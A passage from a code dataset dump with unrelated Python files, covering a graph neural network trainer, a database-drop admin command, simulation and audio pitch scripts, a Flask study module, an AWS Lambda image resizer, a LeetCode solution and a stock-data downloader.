full dataset. Be aware of this\")\n\ncriterion = L1Loss()\n# criterion = MSELoss()\n\nif UNSEEN_REGION is not None:\n seen_region = 'right' if UNSEEN_REGION == 'left' else 'left'\n warn(f\"Training on {seen_region} minima only. Testing on {UNSEEN_REGION} minima.\")\n\n with open(f\"{DATA_DIR}/left.json\", \"r\") as l:\n left = json.load(l)\n\n with open(f\"{DATA_DIR}/right.json\", \"r\") as r:\n right = json.load(r)\n\n # Training on everything else\n if UNSEEN_REGION == \"left\":\n indexes = left\n else:\n indexes = right\n\n train_ind = [i for i in range(N_SAMPLES) if i not in indexes]\n # half to validation, half to test\n random.shuffle(indexes)\n split = np.int(0.5 * len(indexes))\n validation_ind = indexes[:split]\n test_ind = indexes[split:]\nelse:\n indexes = [i for i in range(N_SAMPLES)]\n random.shuffle(indexes)\n indexes = indexes[:np.int(run_parameters[\"dataset_perc\"]*N_SAMPLES)]\n split = np.int(run_parameters[\"train_split\"]*len(indexes))\n train_ind = indexes[:split]\n split_2 = split + np.int(run_parameters[\"validation_split\"]*len(indexes))\n validation_ind = indexes[split:split_2]\n test_ind = indexes[split_2:]\n\ngraph_samples = []\nfor i in range(N_SAMPLES):\n try:\n if OVERWRITE_PICKLES:\n raise FileNotFoundError\n\n with open(\"{}/{}-dihedrals-graph.pickle\".format(DATA_DIR, i), \"rb\") as p:\n debruijn = pickle.load(p)\n\n except FileNotFoundError:\n atoms, edges, angles, dihedrals = mol2graph.get_richgraph(\"{}/{}.json\".format(DATA_DIR, i))\n\n debruijn = mol2graph.get_debruijn_graph(atoms, angles, dihedrals, shuffle=run_parameters[\"shuffle\"])\n\n if OVERWRITE_PICKLES:\n with open(\"{}/{}-dihedrals-graph.pickle\".format(DATA_DIR, i), \"wb\") as p:\n pickle.dump(debruijn, p)\n\n graph_samples.append(debruijn)\n\nwith open(TARGET_FILE, \"r\") as t:\n target = torch.as_tensor([torch.tensor([float(v)]) for v in t.readlines()][:N_SAMPLES])\n if not NORMALIZE_TARGET:\n target = target.reshape(shape=(len(target), 1))\n\n# Compute STD and MEAN only on training data\ntarget_mean, target_std = 0, 1\nif NORMALIZE_TARGET:\n # training_target = torch.tensor([target[i] for i in train_ind])\n target_std = torch.std(target, dim=0)\n target_mean = torch.mean(target, dim=0)\n target = 
((target - target_mean) / target_std).reshape(shape=(len(target), 1))\n\n# with open(f\"{DATA_DIR}/dihedrals.json\", \"w\") as j:\n# json.dump([sample[2] for sample in graph_samples], j)\n\nif NORMALIZE_DATA:\n # Single graph normalization\n samples = normalize(graph_samples, train_ind, False)\nelse:\n samples = graph_samples\n\ndataset = []\nfor i, sample in enumerate(samples):\n dataset.append(\n Data(x=sample[0], edge_index=sample[1], y=target[i]).to(device)\n )\n\nprint(\"Dataset loaded\")\n\n# TODO: batches\nmodel = UnweightedDebruijnGraphNet(dataset[0], out_channels=run_parameters[\"out_channels\"]).to(device)\n\nstopping = EarlyStopping(patience=run_parameters[\"patience\"])\noptimizer = torch.optim.SGD(model.parameters(), lr=run_parameters[\"learning_rate\"], momentum=0.8)\n# TODO: scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, mode='min',\n# factor=0.7, patience=5,\n# min_lr=0.00001)\n# TODO: print a good summary of the model https://github.com/szagoruyko/pytorchviz\nprint(model)\nstart = time.time()\nfor i in range(run_parameters[\"epochs\"]):\n model.train()\n random.shuffle(train_ind)\n for number, j in enumerate(tqdm.tqdm(train_ind)):\n # Forward pass: Compute predicted y by passing x to the model\n y_pred = model(dataset[j].to(device))\n\n # Compute and print loss\n loss = criterion(y_pred, dataset[j].y)\n\n # Zero gradients, perform a backward pass, and update the weights.\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # Compute validation loss\n model.eval()\n val_losses = []\n # save some memory\n with torch.no_grad():\n for j in validation_ind:\n y_pred = model(dataset[j].to(device))\n val_loss = criterion(y_pred, dataset[j].y)\n val_losses.append(val_loss.item())\n\n val_loss = torch.mean(torch.as_tensor(val_losses)).item()\n if NORMALIZE_TARGET:\n val_loss = val_loss*target_std\n print(\"Epoch {} - Validation MAE: {:.2f}\".format(i+1, val_loss))\n\n # Check Early Stopping\n if stopping.check(val_loss):\n run_parameters[\"epochs\"] = i+1\n print(f\"Training finished because of early stopping. Best loss on validation: {stopping.best_score}\")\n break\n\nduration = (time.time() - start) / 60.0 # Minutes\nhours = np.int(np.floor(duration / 60.0))\nminutes = np.int(np.floor(duration - hours*60))\n\npredictions = []\nerrors = []\nmodel.eval()\nfor j in test_ind:\n # Forward pass: Compute predicted y by passing x to the model\n prediction = model(dataset[j].to(device))\n error = prediction - dataset[j].y\n predictions.append(prediction.item())\n errors.append(error.item())\n\n# Compute MAE\nmae = np.absolute(np.asarray(errors)).mean()\nif NORMALIZE_TARGET:\n mae *= target_std\nprint(\"Mean Absolute Error: {:.2f}\".format(mae))\n\n# Save predictions as json\ndirectory = f\"logs/{DATASET_TYPE}-{datetime.now().strftime('%m%d-%H%M')}-mae:{mae:.2f}\"\nos.makedirs(directory)\nwith open(f\"{directory}/result.json\", \"w\") as f:\n json.dump({\n \"run_parameters\": run_parameters,\n \"duration\": f\"{hours}h{minutes}m\",\n \"predicted\": predictions,\n \"target\": [float(target[i].item()) for i in test_ind],\n \"target_std\": float(target_std),\n \"target_mean\": float(target_mean),\n \"test_frames\": test_ind,\n \"train_frames\": train_ind,\n }, f)\n\ntorch.save({\n \"parameters\": model.state_dict()\n}, f\"{directory}/parameters.pt\")\n\n\n# !!!!. Visualize weights and outputs from layers to see how the NN performs\n\n# !. Read paper on NNConv after having read slides from geometric deep learning\n# !. 
Understand what is graph attention and try pooling methods (adaptive pooling from pytorch seems to work)\n# Try to use batch to avoid loss oscillation (makes sense?)\n# (....) Try HypergraphConv layer\n\n# ? (To investigate) use dataset batching https://pytorch-geometric.readthedocs.io/en/latest/notes/batching.html\n# ?. Add dropout layer if needed\n# ?. check if should use edge_weight or edge_attributes\n\n# Plus: Understand what pos= on Data means (should not change since I don't use it in the FirstGraphNet)\n","sub_path":"debruijn.py","file_name":"debruijn.py","file_ext":"py","file_size_in_byte":8558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"336527637","text":"import os\nfrom sqlalchemy.engine.url import make_url\n\nfrom orun.core.management import commands\nfrom orun.db import connections\nfrom .createdb import _create_connection\n\n\n@commands.command('dropdb')\ndef command(database, **options):\n drop(database)\n\n\ndef drop(db):\n db_settings = connections.databases[db]\n url = make_url(db_settings['ENGINE'])\n db_engine = url.drivername.split('+')[0]\n db_name = url.database\n\n if db_engine == 'sqlite' and db_name == ':memory:':\n return\n\n conn = _create_connection(url)\n commands.echo('Dropping db \"%s\"' % db_name)\n\n if db_engine == 'sqlite':\n del conn\n try:\n os.remove(db_name)\n except Exception as e:\n commands.echo(e, err=True)\n elif db_engine == 'postgresql':\n conn.connection.set_isolation_level(0)\n try:\n conn.execute('''SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname = '%s';''' % db_name)\n conn.execute('''DROP DATABASE \"%s\"''' % db_name)\n except Exception as e:\n commands.echo(e, err=True)\n conn.autocommit = False\n elif db_engine == 'mysql':\n try:\n conn.execute('''DROP DATABASE IF EXISTS %s''' % db_name)\n except Exception as e:\n commands.echo(e, err=True)\n elif db_engine == 'mssql':\n try:\n conn.execute('''DROP DATABASE [%s]''' % db_name)\n except Exception as e:\n commands.echo(e, err=True)\n conn.autocommit = False\n elif db_engine == 'oracle':\n try:\n conn.execute('DROP USER usr_%s CASCADE' % db)\n except Exception as e:\n commands.echo(e, err=True)\n\n commands.echo('Database \"%s\" has been dropped successfully' % db_name)\n","sub_path":"orun/core/management/commands/dropdb.py","file_name":"dropdb.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"580710681","text":"#!/sw/bin/python2.7\n\nimport subprocess, shlex\nimport numpy as np\nfrom tqdm import tqdm\nfrom multiprocessing import Pool\nimport sys\nimport re\n#import rr_proposed_ckpt_sim_mod as sim\nimport rr_proposed_isolated_sim_mod as sim\n\nRANGE=512\n\ndef f(cmd):\n return sim.main(len(sys.argv), sys.argv, shlex.split(cmd))\n\npar = int(sys.argv[1])\npar = 2 if par < 2 else par\nmax_par_runs = int(par/2)\np = re.compile('^Process\\s[0-9]+,')\nfilter_fn = lambda x: filter(lambda l: p.match(l), x.split('\\n'))\n\ndef prefix_details_fn(run, policy, lst):\n return map(lambda s: '%d, %s, %s\\n' % (run, policy, s), lst)\n\npool = Pool(processes=par)\nfor oci in range(1):\n run_num = 1\n #lightAppCkpts = int(sys.argv[3])\n lightAppCkpts = 0\n #oci_factor = 1.0 + oci * 0.1\n oci_factor = float(sys.argv[2])\n aux_filename = \"aux-results-mtbf-5-oci-%.1f-ckpts-%d.csv\" % (oci_factor, lightAppCkpts)\n #results_filename = \"results-oci-%.1f-ckpts-%d.csv\" % (oci_factor, lightAppCkpts)\n aux = open(aux_filename, \"w\")\n 
aux.write(\"Run, Policy, Process #, Delta, Total Time, Useful Time, Ckpt Time, Lost Time, Job Failures, Total Failures\\n\")\n with tqdm(total=RANGE*1) as pbar:\n for i in range(int(RANGE/(max_par_runs))):\n computeTime = 100*1000/2\n cmdSort = \"-w -n 100 --run-time %d --mtbf 5 --oci-scale-factor %.1f\" % (computeTime, oci_factor)\n #cmdNoSort = \"-w -n 2 --run-time %d --mtbf 10 --ckpts-before-yield1 0 --ckpts-before-yield2 0\" % (computeTime)\n #a = [cmdSort, cmdNoSort]\n a = [cmdSort]\n arr = []\n for j in range(max_par_runs):\n arr.extend(a)\n res = pool.map(f, arr)\n for j in range(max_par_runs):\n # one result per submitted run; the hardcoded res[0]/res[1] indices were stale\n # leftovers from the two-command version and overran res when max_par_runs < 2\n aux.writelines(prefix_details_fn(run_num, \"isolated\", filter_fn(res[j])))\n run_num += 1\n pbar.update(max_par_runs)\n \n aux.close()\n \npool.close()\npool.join()\n","sub_path":"results/multi-proc/parallel-run-isolated.py","file_name":"parallel-run-isolated.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"355202683","text":"from sys import argv\nimport numpy as np\nimport wave, struct, math\n\nstep = 2 ** (1.0/12.0)\nbase_tones = ['c', 'cis', 'd', 'es', 'e', 'f',\n 'fis', 'g', 'gis', 'a', 'bes', 'b']\n\ndef merge_peaks(peaks, frate):\n\n merged_peaks = []\n\n start = peaks[0][0]\n end = peaks[1][0]\n curr_peaks = peaks[0][1]\n\n for i in range(len(peaks)):\n peak = peaks[i]\n next_peak = peak\n\n if i+1 < len(peaks):\n next_peak = peaks[i+1]\n\n if np.array_equal(peak[1], curr_peaks):\n end = next_peak[0]\n\n else:\n merged_peaks.append((start, end, curr_peaks))\n start = peak[0]\n end = next_peak[0]\n curr_peaks = peak[1]\n\n merged_peaks.append((start, end, curr_peaks))\n return merged_peaks\n\ndef get_peaks(data_avg, frate):\n peaks = []\n\n i = 0\n\n while (i + frate) <= len(data_avg):\n\n chunk = data_avg[i:i+frate]\n amps = np.abs(np.fft.rfft(chunk))\n chunk_avg = np.mean(amps)\n\n segment_peaks = {}\n p_start = None\n\n for j in range(0, len(amps)):\n if amps[j] >= (20 * chunk_avg):\n segment_peaks[j] = amps[j]\n\n top_peaks = []\n\n if len(segment_peaks) > 3:\n\n for _ in range(3):\n max_peak_idx = sorted(segment_peaks.items(), key=lambda kv: kv[1], reverse=True)[0][0]\n top_peaks.append(max_peak_idx)\n del segment_peaks[max_peak_idx]\n try:\n del segment_peaks[max_peak_idx - 1]\n del segment_peaks[max_peak_idx + 1]\n except KeyError:\n pass\n\n else:\n top_peaks = list(segment_peaks.keys())\n\n peaks.append((i, sorted(top_peaks)))\n\n i += int(frate / 10)\n\n return peaks\n\ndef frame_to_time(frame, frate):\n return frame / frate\n\ndef get_octave_and_pitch(freq):\n\n octave_start = base_freq * math.pow(2, -9/12)\n\n if (freq >= octave_start) and (freq < 2*octave_start):\n octave = 0\n elif freq < octave_start:\n i = -1\n while freq < (octave_start * (2 ** i)):\n i -= 1\n octave = i\n else:\n i = 2\n while freq >= (octave_start * (2 ** i)):\n i += 1\n octave = i-1\n\n octave_start *= math.pow(2, octave)\n\n curr_tone = octave_start\n next_tone = octave_start * step\n\n for id in range(12):\n\n if freq >= curr_tone and freq < next_tone:\n id, cents, octave_change = compute_cents(curr_tone, next_tone, freq, id)\n\n if octave_change:\n return (octave + 1, id, cents)\n\n return (octave, id, cents)\n\n curr_tone = next_tone\n next_tone *= step\n\n\ndef compute_cents(lower, higher, freq, id):\n\n cent_step = (higher - lower) / 100.0\n midpoint = lower + (50 * cent_step)\n\n if 
abs(lower - freq) < (cent_step / 2):\n return (id, None, None)\n\n if freq <= midpoint:\n cents = (freq - lower) / cent_step\n return (id, int(round(cents)), None)\n else:\n cents = (higher - freq) / cent_step\n cents = -1 * cents\n octave = None\n if id + 1 > 11:\n id = -1\n octave = 1\n return (id+1, int(round(cents)), octave)\n\ndef pitch_to_string(octave, id, cents):\n\n pitch = base_tones[id]\n\n if octave >= 0:\n pitch += abs(octave + 1) * \"'\"\n elif octave < -1:\n pitch = pitch[0].upper() + (pitch[1:] if len(pitch) >= 2 else \"\")\n pitch += abs(octave + 2) * ','\n\n if cents:\n if cents > 0:\n pitch += '+' + str(cents)\n elif cents < 0:\n pitch += '-' + str(abs(cents))\n else:\n pitch += '+0'\n\n return pitch\n\ndef filter_cluster(amps, cluster_start, cluster_end):\n if cluster_end - cluster_start == 1:\n return cluster_start\n\n cluster_max = cluster_start\n cluster_center = cluster_start + ((cluster_end - cluster_start) // 2)\n center_dist = abs(cluster_max - cluster_center)\n\n for i in range(cluster_start+1, cluster_end):\n if amps[i] > amps[cluster_max]:\n cluster_max = i\n center_dist = abs(cluster_max - cluster_center)\n elif amps[i] == amps[cluster_max]:\n if abs(i - cluster_center) < center_dist:\n cluster_max = i\n center_dist = abs(cluster_max - cluster_center)\n\n return cluster_max\n\nif __name__ == '__main__':\n\n base_freq = float(argv[1])\n fname = argv[2]\n\n with wave.open(fname, 'rb') as wav:\n\n data_size = wav.getnframes()\n frate = wav.getframerate()\n nchannels = wav.getnchannels()\n\n data = wav.readframes(data_size)\n\n data = np.array(struct.unpack('{n}h'.format(n=data_size*nchannels), data))\n\n data_per_channel = [data[offset::nchannels] for offset in range(nchannels)]\n data_avg = [sum(e)/len(e) for e in zip(*data_per_channel)]\n\n peaks = get_peaks(data_avg, frate)\n\n if len(peaks) > 0:\n merged_peaks = merge_peaks(peaks, frate)\n\n for m_peak in merged_peaks:\n start_time = frame_to_time(m_peak[0], frate)\n end_time = frame_to_time(m_peak[1], frate)\n\n result = str(start_time) + '-' + str(end_time) + ' '\n\n for peak in m_peak[2]:\n result += pitch_to_string(*get_octave_and_pitch(peak)) + ' '\n\n print(result)\n\n else:\n print('no peaks')\n","sub_path":"07-exercise/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":5406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"51241515","text":"\nimport copy\nimport subprocess\nimport warnings\n\nfrom nctoolkit.api import open_data\nfrom nctoolkit.cleanup import cleanup\nfrom nctoolkit.flatten import str_flatten\nfrom nctoolkit.runthis import run_this\nfrom nctoolkit.session import nc_safe\n\n\ndef bottom(self):\n \"\"\"\n Extract the bottom level from a dataset\n\n\n \"\"\"\n\n # extract the number of the bottom level\n # Use the first file for an ensemble\n # pull the cdo command together, then run it or store it\n if type(self.current) is list:\n ff = self.current[0]\n warnings.warn(\n message=\"The first file in ensemble used to determine number of vertical levels\"\n )\n else:\n ff = self.current\n\n cdo_result = subprocess.run(\n \"cdo nlevel \" + ff, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n ).stdout\n n_levels = int(\n str(cdo_result).replace(\"b'\", \"\").strip().replace(\"'\", \"\").split(\"\\\\n\")[0]\n )\n\n cdo_command = f\"cdo -sellevidx,{str(n_levels)}\"\n\n run_this(cdo_command, self, output=\"ensemble\")\n\n\ndef surface(self):\n \"\"\"\n Extract the top/surface level from a dataset\n\n \"\"\"\n\n 
cdo_command = \"cdo -sellevidx,1\"\n run_this(cdo_command, self, output=\"ensemble\")\n\n\ndef vertical_interp(self, levels=None):\n \"\"\"\n Verticaly interpolate a dataset based on given depths\n\n Parameters\n -------------\n levels : list, int or str\n list of vertical levels, for example depths for an ocan model, to vertical interpolate to. These must be floats or ints.\n\n \"\"\"\n\n if levels is None:\n raise ValueError(\"Please supply vertical depths\")\n\n # below used for checking whether vertical remapping occurs\n\n # first a quick fix for the case when there is only one vertical depth\n\n if (type(levels) == int) or (type(levels) == float):\n levels = {levels}\n\n for vv in levels:\n if (type(vv) is not float) and (type(vv) is not int):\n raise TypeError(f\"{vv} is not a valid depth\")\n\n levels = str_flatten(levels, \",\")\n cdo_command = f\"cdo -intlevel,{levels}\"\n\n run_this(cdo_command, self, output=\"ensemble\")\n\n\ndef vertstat(self, stat=\"mean\"):\n \"\"\"Method to calculate the vertical mean from a function\"\"\"\n cdo_command = f\"cdo -vert{stat}\"\n\n run_this(cdo_command, self, output=\"ensemble\")\n\n # clean up the directory\n\n\ndef vertical_mean(self):\n \"\"\"\n Calculate the depth-averaged mean\n \"\"\"\n\n return vertstat(self, stat=\"mean\")\n\n\ndef vertical_min(self):\n \"\"\"\n Calculate the vertical minimum of variable values\n \"\"\"\n\n return vertstat(self, stat=\"min\")\n\n\ndef vertical_max(self):\n \"\"\"\n Calculate the vertical maximum of variable values\n \"\"\"\n\n return vertstat(self, stat=\"max\")\n\n\ndef vertical_range(self):\n \"\"\"\n Calculate the vertical range of variable values\n \"\"\"\n\n return vertstat(self, stat=\"range\")\n\n\ndef vertical_sum(self):\n \"\"\"\n Calculate the vertical sum of variable values\n \"\"\"\n\n return vertstat(self, stat=\"sum\")\n\n\ndef vertical_cum(self):\n \"\"\"\n Calculate the vertical sum of variable values\n \"\"\"\n\n return vertstat(self, stat=\"cum\")\n\n\ndef invert_levels(self):\n \"\"\"\n Invert the levels of 3D variables\n \"\"\"\n cdo_command = \"cdo -invertlev\"\n\n run_this(cdo_command, self, output=\"ensemble\")\n\n\ndef bottom_mask(self):\n \"\"\"\n Create a mask identifying the deepest cell without missing values.\n 1 identifies the deepest cell with non-missing values. 
Everything else is 0, or missing.\n At present this method only uses the first available variable from netcdf files, so it may not be suitable for all data\n \"\"\"\n self.run()\n\n if type(self.current) is list:\n raise TypeError(\"This only works for single file datasets\")\n data = open_data(self.current)\n\n if len(data.variables_detailed.query(\"levels>1\")) == 0:\n raise ValueError(\"There is only one vertical level in this file!\")\n\n var_use = data.variables_detailed.query(\"levels>1\").variable[0]\n data.select_variables(var_use)\n data.select_timestep(0)\n data.set_missing([0, 0])\n data.transmute({\"Wet\": var_use + \" == \" + var_use})\n data.invert_levels()\n data.run()\n bottom = data.copy()\n bottom.vertical_cum()\n bottom.compare_all(\"==1\")\n bottom.multiply(data)\n bottom.invert_levels()\n bottom.rename({\"Wet\": \"bottom\"})\n bottom.set_longnames({\"bottom\": \"Identifier for cell nearest seabed\"})\n bottom.set_missing([0, 0])\n bottom.run()\n\n self.current = copy.deepcopy(bottom.current)\n\n self.history = copy.deepcopy(bottom.history)\n self._hold_history = copy.deepcopy(self.history)\n\n cleanup()\n","sub_path":"nctoolkit/verticals.py","file_name":"verticals.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"544673030","text":"from pykiwoom.kiwoom import *\r\nimport time\r\n\r\nkiwoom = Kiwoom()\r\nkiwoom.CommConnect(block=True)\r\n\r\n# 전종목 일봉데이터를 엑셀로 저장하기\r\n# 전종목 종목코드\r\nkospi = kiwoom.GetCodeListByMarket('0')\r\nkosdaq = kiwoom.GetCodeListByMarket('10')\r\ncodes = kospi + kosdaq\r\n\r\n# 문장열로 오늘 날짜 얻기\r\nnow = datetime.datetime.now()\r\ntoday = now.strftime('%Y%m%d')\r\n\r\nnum = 1\r\n# 전 종목의 일봉 데이터\r\n# enumerate 몇 번째 반복문인지 확인하고 싶을때 튜플형태로 반환\r\n# 그래서 i로 몇 번째 인지 알 수 있음(index, list의 element) 형태\r\n# TR 요청 안했었음 한 번에 600개 행만 보내줌\r\n# 장시작까지는 8700개의 행이 필요함\r\nfor i, code, in enumerate(codes):\r\n if i < 627:\r\n continue # 20210903 13:04 441까지하다가 lock걸림\r\n dfs=[]\r\n print(f\"{i}/{len(codes)} {code}\")\r\n df = kiwoom.block_request(\"opt10081\",\r\n 종목코드=code,\r\n 기준일자=today,\r\n 수정주가구분=1,\r\n output=\"주식일봉차트조회\",\r\n next=0)\r\n dfs.append(df)\r\n\r\n while kiwoom.tr_remained:\r\n print(\"{}th 종목의 Data가 남아있어 추가 TR 요청을 {} 번째 중입니다.\".format(i, num))\r\n df = kiwoom.block_request(\"opt10081\",\r\n 종목코드=code,\r\n 기준일자=today,\r\n 수정주가구분=1,\r\n output=\"주식일봉차트조회\",\r\n next=2)\r\n dfs.append(df)\r\n num += 1\r\n # 시간 더 늘렸음 - 296번째에서 과도한 traffic 발생한다고 함\r\n time.sleep(2.5)\r\n\r\n print(\"TR 추가 요청이 끝났습니다.\")\r\n df = pd.concat(dfs)\r\n num = 1\r\n out_name = f\"{code}.xlsx\"\r\n\r\n df.to_excel(out_name)\r\n time.sleep(4.5)\r\n\r\nprint(\"ALL TR finished\")","sub_path":"TR.py","file_name":"TR.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"414302763","text":"from flask import session, g, json\nfrom attrdict import AttrDict\n\nfrom .models import Study\nfrom .security import current_user\nfrom .users import get_hydrauser, get_hydraurl, save_user_settings, \\\n get_hydrausers\n\nfrom openagua import db\n\n\ndef add_study(hydrauser_id, project_id):\n study = Study()\n study.hydrauser_id = hydrauser_id\n study.project_id = project_id\n db.session.add(study)\n db.session.commit()\n\n session['project_id'] = project_id\n session['study_id'] = study.id\n\n return study\n\n\ndef update_study(id, updates):\n Study.query.filter_by(id=id).update(updates)\n db.session.commit()\n 
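# Illustrative usage (assumed field names, not from the original source):\n # update_study(study.id, {\"project_id\": new_project.id})\n # Query.update() applies the dict as column updates; commit() persists them.\n 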
return\n\n\ndef delete_studies(hydra_userid, network_id):\n Study.query.filter_by(hydra_userid=hydra_userid, network_id=network_id).delete()\n db.session.commit()\n\n\ndef delete_study(study_id):\n Study.query.filter_by(id=study_id).delete()\n db.session.commit()\n\n\ndef get_study(**kwargs):\n if 'project_id' in kwargs and 'hydrauser_id' in kwargs:\n study = Study.query.filter_by(\n project_id=kwargs['project_id'],\n hydrauser_id=kwargs['hydrauser_id']\n ).first()\n if not study:\n study = add_study(kwargs['hydrauser_id'], kwargs['project_id'])\n\n elif 'study_id' in kwargs:\n study_id = kwargs['study_id']\n study = Study.query.filter_by(id=study_id).first()\n\n else:\n study = None\n\n return study\n\n\ndef get_studies(**kwargs):\n studies = []\n if 'hydrauser_id' in kwargs:\n studies = Study.query.filter_by(hydrauser_id=kwargs['hydrauser_id'])\n elif 'url' in kwargs:\n hydrausers = get_hydrausers(url=kwargs['url'])\n for hydrauser in hydrausers:\n studies.extend(Study.query.filter_by(hydrauser_id=hydrauser.id))\n return studies\n\n\ndef activate_study(**kwargs):\n if 'study_id' in kwargs:\n study_id = kwargs['study_id']\n elif 'hydrauser_id' in kwargs and 'project_id' in kwargs:\n study = get_study(**kwargs)\n study_id = study.id\n else:\n study_id = None\n if study_id:\n save_user_settings(current_user, 'active_study', study_id)\n\n\ndef load_active_study(load_from_hydra=False):\n\n settings = current_user.settings\n if settings:\n settings = json.loads(settings)\n else:\n settings = {}\n\n if 'active_study' in settings:\n study = get_study(study_id=settings['active_study'])\n elif 'study_id' in session and session['study_id']:\n study = get_study(study_id=session['study_id'])\n save_user_settings(current_user, 'active_study', study.id)\n else:\n study = None\n\n if study:\n session['study_id'] = study.id\n session['project_id'] = study.project_id\n session['hydrauser_id'] = study.hydrauser_id\n\n g.hydrauser = get_hydrauser(id=study.hydrauser_id)\n hydraurl = get_hydraurl(id=g.hydrauser.hydra_url_id)\n session['hydra_url'] = hydraurl.url\n\n g.study = study\n\n else:\n g.study = None\n session['study_id'] = None\n session['project_id'] = None\n\n if load_from_hydra and g.study:\n\n # get project\n result = g.conn.get_project(g.study.project_id)\n if 'faultcode' in result:\n g.project = None\n session['project_name'] = None\n else:\n g.project = result\n session['project_name'] = g.project.name\n\n # get network\n include_data = True # assumed default; this name was otherwise undefined\n result = g.conn.get_network(g.study.active_network_id, include_data)\n if 'faultcode' in result:\n g.network = None\n else:\n g.network = result\n\n # get template\n result = g.conn.get_template(g.study.active_template_id)\n if 'faultstring' in result:\n g.template = None\n else:\n g.template = result\n g.ttypes = {}\n g.ttype_dict = {}\n for ttype in g.template.types:\n g.ttypes[ttype.id] = ttype\n g.ttype_dict[ttype.name] = ttype.id\n\n if g.study and type(g.study.settings) is str:\n g.study_settings = AttrDict(json.loads(g.study.settings))\n else:\n g.study_settings = AttrDict({})\n\n\ndef add_default_project(conn, user):\n project_name = user.email\n project_description = 'Default project created for {} {} ({})'.format(\n user.firstname,\n user.lastname,\n user.email\n )\n\n # add project\n project = conn.call('add_project', {'project': {'name': project_name, 'description': project_description}})\n\n return 
project\n","sub_path":"openagua/studies.py","file_name":"studies.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"299988369","text":"from PIL import Image\nimport tempfile\nfrom boto3.session import Session\ndef lambda_handler(event, context):\n print(\"start\")\n session = Session(aws_access_key_id='',\n aws_secret_access_key='', region_name='ap-northeast-1')\n print(\"s3\")\n s3 = session.resource(\"s3\")\n print(\"images-from\")\n bucket = s3.Bucket('images-from')\n dir_images = tempfile.TemporaryDirectory()\n print(dir_images.name)\n for obj in bucket.objects.all():\n print(\"download_file:\"+obj.key)\n s3.meta.client.download_file('images-from', obj.key, dir_images.name + '\\\\' + obj.key)\n print(\"Image.open:\" + obj.key)\n img = Image.open(dir_images.name + '\\\\' + obj.key)\n w, h = img.size\n img.thumbnail((w // 2, h // 2))\n print(\"img.save:\" + obj.key)\n img.save(dir_images.name + '\\\\' + obj.key)\n s3.meta.client.upload_file(dir_images.name + '\\\\' + obj.key, 'images-to', obj.key)\n print(\"uploaded:\" + obj.key)\n dir_images.cleanup()\n print('end')\n return {\n 'statusCode': 200\n }\n\n\n","sub_path":"image_resize/lambda_function3.py","file_name":"lambda_function3.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"563559092","text":"# 给定一个字符串,你需要反转字符串中每个单词的字符顺序,同时仍保留空格和单词的初始顺序。 \n# \n# \n# \n# 示例: \n# \n# 输入:\"Let's take LeetCode contest\"\n# 输出:\"s'teL ekat edoCteeL tsetnoc\"\n# \n# \n# \n# \n# 提示: \n# \n# \n# 在字符串中,每个单词由单个空格分隔,并且字符串中不会有任何额外的空格。 \n# \n# Related Topics 字符串 \n# 👍 245 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def reverseWords1(self, s: str) -> str:\n \"\"\"\n 手写api\n \"\"\"\n\n def reverse(left, right):\n while left < right:\n s[left], s[right] = s[right], s[left]\n left += 1\n right -= 1\n\n def reverse_each_word():\n n = len(s)\n start = end = 0\n while start < n:\n # 找到每个单词的末尾\n while end < n and s[end] != ' ':\n end += 1\n # 翻转当前单词\n reverse(start, end - 1)\n # 更新start,去找下一个单词\n start = end + 1\n end += 1\n\n s = list(s)\n reverse_each_word()\n return ''.join(s)\n\n def reverseWords(self, s: str) -> str:\n \"\"\"\n 将s按空格分割 --> 按单词翻转 --> 转回string\n \"\"\"\n return ' '.join(word[::-1] for word in s.split())\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_09/day61_[557]反转字符串中的单词 III_homework.py","file_name":"day61_[557]反转字符串中的单词 III_homework.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468782402","text":"# coding=utf8\nimport os\nimport numpy as np\nimport random\nimport re\nimport soundfile as sf\nimport resampy\nimport librosa\nimport argparse\nimport yaml\n\nclass AttrDict(dict):\n def __init__(self, *args, **kwargs):\n super(AttrDict, self).__init__(*args, **kwargs)\n self.__dict__ = self\n\n\ndef read_config(path):\n return AttrDict(yaml.load(open(path, 'r')))\n\n# Add the config.\nparser = argparse.ArgumentParser(description='predata scripts.')\nparser.add_argument('-config', default='config_WSJ0.yaml', type=str,\n # parser.add_argument('-config', default='config_mix.yaml', type=str,\n help=\"config file\")\nopt = parser.parse_args()\nconfig = read_config(opt.config)\n\nchannel_first = config.channel_first\nnp.random.seed(1) # 设定种子\nrandom.seed(1)\n\naim_path = 
